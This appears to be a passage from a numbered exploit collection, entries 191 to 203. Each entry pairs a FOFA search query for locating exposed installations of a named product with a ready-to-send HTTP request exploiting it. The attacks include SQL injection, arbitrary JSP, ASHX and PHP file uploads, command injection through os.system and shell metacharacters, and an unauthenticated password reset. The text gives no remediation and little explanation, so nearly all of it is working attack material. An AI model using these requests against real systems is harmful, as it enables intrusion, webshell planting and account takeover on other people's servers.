191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone Networks (山石网科) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload interface file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 (Weiqing) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
